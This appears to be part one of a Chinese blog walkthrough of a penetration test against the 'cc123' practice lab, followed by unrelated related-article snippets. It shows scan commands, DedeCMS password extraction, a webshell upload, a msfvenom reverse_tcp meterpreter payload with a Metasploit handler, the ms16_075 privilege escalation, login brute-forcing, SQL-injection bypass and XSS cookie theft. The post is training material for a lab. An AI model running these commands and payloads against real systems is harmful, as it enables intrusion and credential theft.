零基础‘自外网到内网’渗透过程详细记录(cc123靶场)——上

一、网络环境示意图

二、环境搭建

首先将三个虚拟机使用VMware打开。

接下来对虚拟机进行配置。

首先配置虚拟机“护卫神主机大师(项目四)”。

点击编辑虚拟机设置。

发现存在两个网卡。

打开虚拟网络编辑器。

点击更改设置。

点击添加网络。

选择VM19后点击确定。

根据网络示意图,配置VM19,将其子网ip配置为:10.10.10.0,然后点击确定将配置保存。

根据网络示意图,用同样打方法添加VM18。

将其子网ip配置为:10.10.1.0,然后点击确定将配置保存。

将虚拟机“护卫神主机大师(项目四)”启动。点击“我已复制虚拟机”。

成功启动如下图所示。

接下来启动“SQL2008数据库(项目四)”。

成功启动如下图所示。

启动“目标机子(项目四)”。

成功启动如下图所示。

分别检查三台虚拟机的ip并测试连通性。

三、初步信息收集

启动kali。

创建“cc123”文件夹,方便后期存储。

扫描主机。

netdiscover -i eth0 -r 192.168.10.0/24

扫描到目标主机:192.168.10.134。

扫描主机的第二种方法。

nmap -sn 192.168.10.0/24

同样扫描到目标主机。

扫描前面发现的主机的端口。

masscan -p 1-65535 192.168.10.134 --rate=1000

使用nmap对上面扫描得到的端口进行详细的信息收集。

nmap -sC -A 192.168.10.134 -p 80,53,49154,6588,3389,135,21,51464,999 -oA cc123-port

发现80端口,尝试进行访问。

打开本地host文件进行域名绑定,加入ip及对应域名后保存文件。

文件路径:C:\Windows\System32\drivers\etc\hostsip及对应域名:192.168.10.134 www.cc123.com

绑定后访问域名。

域名:​​​​​​​www.cc123.com

发现999端口,尝试进行访问,发现是phpadmin。

发现6588端口,尝试进行访问,发现是主机大师。

进入“护卫神主机大师(项目四)”,点击管理面板->DNS,进行域名绑定。

右键后点击新建主机。

输入ip地址后点击添加主机即可。

前面kali内发现53端口,想到其可能存在DNS服务。

设置本地机网关。

DNS:192.168.10.134

此时就可以将前面绑定的域名删除,删除后再次将hosts文件保存。

ping网址www.cc123.com进行验证,可以看到指向的ip仍未192.168.10.134。

打开kali的resolv.conf文件进行域名绑定。

打开配置文件,将其修改为:192.168.10.134。

vi /etc/resolv.conf

修改后保存。

wq!

接下来扫描服务器看其是否存在子域名。

wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53

对上面的扫描到的子域名依次进行访问。

至此可以得到子域名包括如下:

  • http://www.cc123.com
  • http://ww2.cc123.com
  • http://new.cc123.com

四、http://new.cc123.com漏洞发现

接下里对扫描到的域名进行漏洞检测。

首先检测http://new.cc123.com​​​​​​​。

根据其图标,发现其是织梦的cms。

查看其版本号。

http://new.cc123.com/data/admin/ver.txt

得到其版本为20150618,此版本存在漏洞。

接下来尝试访问其后台。

http://new.cc123.com/dede

尝试使用默认密码进行登录,但是登录失败了,因此尝试注册一个账号。

http://new.cc123.com/member

输入信息后点击注册。

直接点击完成注册。

注册完成。

从网页内获取cookie,将cookie填入到cookies.txt内。

点击系统设置,分类管理,添加分类。

成功添加分类。

利用exp跑出密码并解密,得到密码为:admin7788。

得到密码后重新来到后台,输入账号密码后点击登录。

发现成功登录到了后台。

点击文件式管理->根目录。

进入目录“a”。

点击文件上传。

选择木马文件并上传。

上传成功。

此时就可以访问到了。

五、利用蚁剑连接webshell

接下来使用蚁剑连接。

双击exe文件打开后进行初始化。

选择文件夹进行初始化。

初始化完成后即可打开工具。

右键后点击添加数据。

输入地址和密码后点击测试连接。

下图所示连接成功。

此时点击“添加”即可。

点击文件管理即可看到网站的整个目录。

效果如下图所示。

六、第一层Web服务器提权

.net文件权限比.php文件权限大,因此向“a”目录上传.net文件。

上传之后就可以进行访问了,密码为:admin。

测试可以执行cmd命令。

因此就可以上传一个攻击载荷进行操作。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.132 lport=12345 -f exe >s.exe

从kali内访问。

http://new.cc123.com/a/ASPXSpy2014.aspx

访问后找到c盘下的$Recycle.Bin文件夹上传文件。

将刚刚生成的exe文件尝试进行上传。

但是提示访问被拒绝。

所以上传wt.asp文件进行解决,其可以扫描可写目录。

上传成功。

成功上传后进行访问。

http://new.cc123.com/a/wt.asp

点击开始扫描。

根据扫描的结果,我们尝试上传到c:\windows\debug\WIA\路径下。

c:\windows\debug\WIA\

再次尝试进行上传。

上传成功。

接下来测试其能否执行。

打开msfconsole。

msfconsole

打开成功后利用handler模块设置监听。

use exploit/multi/handler

设置payload。

set payload windows/meterpreter/reverse_tcp

设置本地ip。

set lhost 192.168.10.132

设置监听端口。

set lport 12345

查看配置。

show options

执行exploit命令开始监听。

命令:exploit

开始监听后,执行前面上传的s.exe文件,输入路径后点击Submit。

/c c:\windows\debug\WIA\s.exe

根据浏览器正在加载判断已经开始执行了。

此时可以看到成功监听到了。

查看ip。

ipconfig

查看uid。

getuid

可以看到当前权限是普通权限,因此接下来要进行提权操作。

执行命令退出。

background

利用local_exploit_suggester模块查找本地是否存在提权漏洞。

use post/multi/recon/local_exploit_suggester

设置session。

set session 1

开始执行。

run

利用扫描到的exploit/windows/local/ms16_075_reflection_juicy提权。

use exploit/windows/local/ms16_075_reflection_juicy

查看所需配置。

show options

设置session。

set SESSION 1

开始执行。

exploit

执行完成后再次查看权限,可以看到此时已经拿到系统权限。

getuid

至此拿到了web服务器系统权限。

七、http://ww2.cc123.com漏洞发现

访问网址,获取其响应头信息。

http://ww2.cc123.com

可以获取到一系列信息。

对网站目录进行扫描。

gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 'aspx,html' -o cc123.log

根据扫描结果验证扫描到的文件是否存在。

根据网页内的文本框,可以猜测页面内存在XSS漏洞。

http://ww2.cc123.com/Message.aspx

找到其后台。

http://ww2.cc123.com/admin/Login.aspx

使用burp抓包。

将数据包发送到repeater。

进入到repeater后点击send放包。

右键后选择。

点击copy复制。

关闭代理后访问复制到的内容,重复访问后发现验证码可以重用,所以这里存在漏洞,可以尝试密码爆破。

右键数据包后将其发送到intruder。

点击clear。

将密码选中。

点击payloads添加字典。

加入字典本。

加入完成后点击Start attack开始测试。

等待爆破完成后,根据Length的不同即可成功获取到密码。

接下来尝试是否存在注入漏洞。

在用户名后面添加引号后放包,观察有无报错。

复制地址。

复制后到浏览器访问。

回到burp内尝试将用户名后面的部分注释掉,发现其进行了302跳转,由此猜测其可能存在注入。

可以看到其跳转到了后台。

用同样的方法复制地址后尝试访问,发现成功进入到后台内。

从后台可以看到还存在两个账号,但是看不到密码。

可以看到后台内存在留言功能,因此猜测是否存在XSS漏洞。

下面进行漏洞验证。

访问开始的时候扫描到的留言页面。

尝试是否存在XSS,输入完成后点击提交。

来到后台内查看。

选中后右键查看源代码。

可以看到确实存在XSS漏洞。

输入弹窗语句再次进行尝试。

再次进入到后台进行查看,发现成功弹窗。

因此就可以通过在前台留言内插入XSS代码,当管理员查看后就可以拿到管理员的cookie,进而可以实现登录后台。

继续观察后台,发现文件上传功能。

抓取数据包,看到可以修改文件名。

将数据包发送到repeater后,把文件名后缀修改成aspx放包进行尝试,发现其存在白名单验证。

因此想要通过文件上传的方式上传木马很难,所以思考有没有别的注入方式。


细节较多,篇幅较大,分为上/下两部分发布在两篇文章内

另一部分详见下面文章

零基础‘自外网到内网’渗透过程详细记录(cc123靶场)——下icon-default.png?t=O83Ahttps://blog.csdn.net/weixin_62808713/article/details/143575815


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/4929.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

架构师必修之项目篇:基于ASR+GPT4.0+TTS实现全双工智能语音助手

1. 系统架构设计 1.1 ASR模块设计 ASR(Automatic Speech Recognition)模块是全双工智能语音助手的前端入口,负责将用户的语音输入转换为文本数据。该模块的设计关键在于高准确率的语音识别和快速响应。 语音信号预处理:首先对采集…

为什么说PPQ对于FPGA的神经网络的量化来说是神?

这几天踩了无数坑把PPQ走通了,把自己搭的一个网络实现了完美量化,测试结果也可以正常分类。看到结果终于明白为什么说PPQ对于FPGA的神经网络的量化来说是神了 虔诚地放出链接: OpenPPL/ppq PS:这辈子要是能去商汤就好了…… 一、 …

VMWareTools安装及文件无法拖拽解决方案

文章目录 1 安装VMWare Tools2 安装vmware tools之后还是无法拖拽文件解决方案2.1 确认vmware tools安装2.2 客户机隔离2.3 修改自定义配置文件2.4 安装open-vm-tools-desktop软件 1 安装VMWare Tools 打开虚拟机VMware Workstation,启动Ubuntu系统,菜单…

【TabBar嵌套Navigation案例-常见问题按钮-WebView-加载本地html文件 Objective-C语言】

一、接下来,我们来说,webView如何加载本地的html文件 1.把这里的http://www.baidu.com/ 如何替换成本地的html文件,实际上,我们只需要把URL替换一下就可以了, 然后呢,先给大家看一眼素材,在我们的help.json里边,比如说,第一个按钮, 如何领奖,这块儿有一个叫做htm…

pwn:[NISACTF 2022]ReorPwn?

题目 解题 附件下载 在kali里打开 执行checksec命令,查看控制程序的命令 64位 用ida64位版本打开 打开页面显示如下 发现关键函数system() 双击system(a) 显示如下 需要知道command是怎么传入的 通过原始的数据可以知道 gets函数获取参数a,即用户输入…

诗林工作室(编号:mb0005)分享:HTML模版Paxton,一款自适应响应式图集、博客设计开发模板

这是来自国外一款HTML网页模板,适合Web开发人员做前端站点设计参考使用。全站模版倾向于图集、博客等多行业的平台模版开发。此模版适合各大CMS的主题模版开发参考,如常见的Wordpress主题开发、Z-Blog模板开发、Typecho模板开发、DiscuzX模板开发、Jooml…

JavaScript缓存之Service Worker workbox

目录 先来看看基础Service Worker 注册阶段 安装和激活 workbox workbox-webpack-plugin 来看看结果 这次再做组件的库模式打包之后想着优化js加载,于是想到了大家用的并不是很多的Service Worker技术,这个技术类似于原生的离线包能力 先来看看基…

Html编写发射粒子爱心

下载html文件&#xff1a;https://download.csdn.net/download/m0_58419490/89963280 <!DOCTYPE html> <html><head><meta http-equiv"Content-Type" content"text/html; charsetUTF-8"><title>&#x1f497;</title>…

什么是分布式光伏发电?设备构成、应用形式讲解

分布式光伏发电系统&#xff0c;又称分散式发电或分布式供能&#xff0c;是指在用户现场或靠近用电现场配置较小的光伏发电供电系统&#xff0c;以满足特定用户的需求&#xff0c;支持现存配电网的经济运行&#xff0c;或者同时满足这两个方面的要求。 分布式光伏发电由哪些设备…

新160个crackme - 093-kesan

运行分析 需破解用户名和注册码 PE分析 Delphi程序&#xff0c;32位&#xff0c;无壳 静态分析&动态调试 ida找不到字符串&#xff0c;根据Delphi程序逻辑&#xff0c;双击进入cls_Unit1_TForm1查找 向下翻找后发现4个事件&#xff0c;逐个分析 动调_TForm1_Edit1Change函数…

OpenAI 的 正式版o1 模型意外泄露,推理能力真是震撼——事情是这样的

序言&#xff1a;无论 OpenAI 出于何种原因&#xff0c;用户的期待和认可都是关键。这次 o1 模型的泄露事件意外引发热议&#xff0c;也让用户有机会一窥 o1 的强大潜力。虽然 OpenAI 已推出 o1-preview 和 o1-mini 供用户试用&#xff0c;性能有所提升&#xff0c;但仍未展现最…

QCon演讲实录|徐广治:边缘云原生操作系统的设计与思考

10月18日&#xff0c;在 QCon 全球软件开发大会 2024&#xff08;上海站&#xff09;&#xff0c;火山引擎边缘云资深架构师徐广治围绕火山引擎边缘计算产品背后的算力底座 - 边缘云原生操作系统&#xff0c;探讨如何实现算力服务的混合部署和跨区域弹性调度&#xff0c;以及在…

「Mac畅玩鸿蒙与硬件31」UI互动应用篇8 - 自定义评分星级组件

本篇将带你实现一个自定义评分星级组件&#xff0c;用户可以通过点击星星进行评分&#xff0c;并实时显示评分结果。为了让界面更具吸引力&#xff0c;我们还将添加一只小猫图片作为评分的背景装饰。 关键词 UI互动应用评分系统自定义星级组件状态管理用户交互 一、功能说明 …

MySQL表设计(三大范式 表的设计)

1.上讲约束复习&#xff1a; 1.NOT NULL 非空约束&#xff0c;被指定NOT NULL的列&#xff0c;值不允许为空(必填) 2. UNIQUE 唯一约束&#xff0c;这个列里的值在表中是唯一的&#xff0c;也就是说不能重复 3. PRIMARY KEY 主键约束&#xff0c;可以看做是NOT NULL和UNIQUE…

继承机制深度解析:从基础到进阶的完整指南

文章目录 1. 继承的概念及定义1.1 继承的概念&#xff1a;1.2继承的定义&#xff1a;1.2.1 定义格式1.2.2 继承基类成员访问方式的变化&#xff1a; 1.3继续类模板 2. 基类和派生类间的转换2.1 向上转换&#xff08;Upcasting&#xff09;2.2 向下转换&#xff08;Downcasting&…

C++(类和对象-友元)

友元的作用 作用&#xff1a; 在C中&#xff0c;友元&#xff08;friend&#xff09;是一种特殊的类成员&#xff0c;它可以让一个函数或者类访问其他类的私有&#xff08;private&#xff09;和保护&#xff08;protected&#xff09;成员。 注意&#xff1a; 友元的使用应该谨…

ssm045基于jsp的精品酒销售管理系统+jsp(论文+源码)_kaic

毕业设计&#xff08;论文&#xff09; 精品酒销售管理系统 学 院 专 业 班 级 学 号 用户姓名 指导教师 完成日期…

解决return code from pthread_create() is 22报错问题

今天在处理芯片数据&#xff0c;在使用rma方法对数据进行预处理时报错&#xff0c;试了非常多的方法&#xff0c;记录一下。 可能时rma函数会涉及调用多线程的操作&#xff0c;这一过程会产生冲突。此错误表示在规范化过程中创建新线程时出现问题&#xff0c;特别是与 pthread_…

ChatPaper.ai - 3分钟读懂一篇论文的AI阅读助手

你是否曾经面对过这些困扰&#xff1f; 堆积如山的论文&#xff0c;不知从何读起 课堂笔记零零散散&#xff0c;复习时一头雾水 会议记录不完整&#xff0c;重要信息错过了 ChatPaper.ai就是为解决这些问题而生的智能助手。 地址&#xff1a;https://www.chatpaper.ai/zh …

0基础入门linux文件系统

目录 文件系统简介 1. 文件系统类型 2. 文件系统结构 3. 文件系统的主要功能 4. 文件系统的使用 5. 文件系统的维护 6. 注意事项 简单举例 机械硬盘 物理结构介绍​编辑 CHS寻址 逻辑结构介绍 LBA寻址法 文件系统与磁盘管理 Boot Block Data block inode block…